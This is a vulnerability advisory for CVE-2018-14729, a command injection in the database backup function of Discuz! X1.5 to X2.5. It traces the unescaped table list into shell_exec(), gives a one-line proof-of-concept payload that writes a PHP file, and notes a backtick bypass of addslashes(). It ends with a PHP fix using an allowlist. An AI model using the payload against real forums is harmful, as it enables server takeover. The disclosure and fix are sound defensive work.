CVE-2018-14729: Discuz! X1.5 to X2.5 Database Backup RCE (Administrative Privileges Required)


Source: https://github.com/FoolMitAh/CVE-2018-14729/blob/master/Discuz_backend_getshell.md

Description

Discuz! X1.5 to X2.5's database backup function in file source/admincp/admincp_db.php allows remote attackers with administrative privileges to execute arbitrary PHP code: the table list taken from the request is concatenated unescaped into the mysqldump command passed to shell_exec(), so the attacker can inject OS commands and write a PHP file to the server.

Vulnerability Type

Other: Remote Code Execution

Vendor of Product

Tencent

Affected Product Code Base

Discuz X1.5 - X2.5

Attack Type

Remote

Impact

Code execution: true

Attack Vectors

Administrative Privileges Required

Has vendor confirmed or acknowledged the vulnerability?

true

Discoverer

MitAh@Chaitin Tech

Detail

Take Discuz! X2.5 as an example. The relevant lines (listed from sink to source) are in:

source/admincp/admincp_db.php

# line 296 (sink): $tablesstr is concatenated into the command string without any escaping
@shell_exec($mysqlbin.'mysqldump --force --quick '.($db->version() > '4.1' ? '--skip-opt --create-options' : '-all').' --add-drop-table'.($_GET['extendins'] == 1 ? ' --extended-insert' : '').''.($db->version() > '4.1' && $_GET['sqlcompat'] == 'MYSQL40' ? ' --compatible=mysql40' : '').' --host="'.$dbhost.($dbport ? (is_numeric($dbport) ? ' --port='.$dbport : ' --socket="'.$dbport.'"') : '').'" --user="'.$dbuser.'" --password="'.$dbpw.'" "'.$dbname.'" '.$tablesstr.' > '.$dumpfile);
# line 281: each table name is only wrapped in double quotes; a quote inside the name closes the wrapper
$tablesstr = '';
foreach($tables as $table) {
    $tablesstr .= '"'.$table.'" ';
}
# line 143 (source): $tables is a reference to the raw, user-controlled request parameter
$tables = & $_GET['customtables'];

Because $tables is taken directly from $_GET['customtables'] and each element is merely wrapped in double quotes, an administrator can close the quote and append shell metacharacters; $tablesstr then reaches shell_exec() unescaped, so arbitrary commands run as the PHP process user.

POC

Set customtables[] = pre_common_admincp_cmenu">aaa; echo '<?php phpinfo(); ?>' > phpinfo.php #

Additional Information

Discuz! 1.5 - 2.0

$tables = $_G['gp_customtables']

These versions escape the value with addslashes(), which only escapes quotes, backslashes and NUL; backticks pass through untouched, so the injection still works via backtick command substitution, e.g. `whoami`.

Discuz! 3.0 - 3.4

The developers introduced a bug that leaves the database backup feature non-functional; however, the vulnerable code path is still present.
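The Detail section above shows the unescaped data flow from customtables[] into shell_exec(), and the note on 1.5 - 2.0 shows why addslashes() is not a shell escape. The following is an added example, not Discuz! code, of how the table list should be built before it reaches the shell: an allowlist check on the table name, escapeshellarg() as defence in depth, and a small check that makes the addslashes() gap visible. The helper names (isValidTableName, buildTablesArg, addslashesLeavesBackticks), the 64-character limit and the sample inputs are assumptions chosen for this example.

```php
<?php
// Added example (not part of Discuz!): safe construction of the mysqldump
// table-list argument. The vulnerable code concatenates raw request values
// into a shell_exec() string; this shows the two controls a fix needs.

// Hypothetical helper: accept only plausible MySQL table names.
// Discuz! tables are prefixed identifiers (e.g. pre_common_admincp_cmenu), so an
// allowlist of [A-Za-z0-9_] (64 chars, MySQL's identifier limit, is an assumption
// used here) covers every legitimate value and excludes every shell metacharacter.
function isValidTableName(string $name): bool
{
    return (bool) preg_match('/\A[A-Za-z0-9_]{1,64}\z/', $name);
}

// Hypothetical helper: build the space-separated table argument string.
// It throws instead of silently dropping bad input so the caller can log the event
// (an admin account sending shell metacharacters here is worth an alert).
function buildTablesArg(array $tables): string
{
    $parts = [];
    foreach ($tables as $table) {
        if (!is_string($table) || !isValidTableName($table)) {
            throw new InvalidArgumentException('Rejected table name: ' . var_export($table, true));
        }
        // escapeshellarg() is defence in depth: nothing that passes the allowlist
        // needs it, but it keeps the string safe if the allowlist is later loosened.
        $parts[] = escapeshellarg($table);
    }
    return implode(' ', $parts);
}

// Why addslashes() (the 1.5 - 2.0 mitigation noted above) is insufficient:
// it escapes ' " \ and NUL only, so a backtick survives and the shell still
// treats it as command substitution.
function addslashesLeavesBackticks(string $value): bool
{
    return strpos(addslashes($value), '`') !== false;
}

// Constructed sample inputs (not real traffic).
$legitimate = ['pre_common_admincp_cmenu', 'pre_forum_post'];
$injected   = ['pre_common_admincp_cmenu"; echo injected #'];  // mirrors the PoC shape
$backticked = 'pre_common_admincp_cmenu`whoami`';

echo "Safe argument string: ", buildTablesArg($legitimate), "\n";
echo "addslashes() keeps the backtick: ", addslashesLeavesBackticks($backticked) ? 'yes' : 'no', "\n";

try {
    buildTablesArg($injected);
} catch (InvalidArgumentException $e) {
    // This is the branch the vulnerable code lacks: the request is refused,
    // nothing is passed to the shell, and the rejection can be logged.
    echo "Blocked: ", $e->getMessage(), "\n";
}
```

The allowlist is the control that actually closes the hole; escapeshellarg() alone would also have been enough for the quoting problem at line 281, but a strict identifier pattern is easier to audit and rejects the backtick case that addslashes() misses. For the sink itself, the other request-derived fragments in the same command (extendins, sqlcompat, the connection parameters) deserve the same treatment.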

REFERENCE

All rights reserved. © 2018 VULNSPY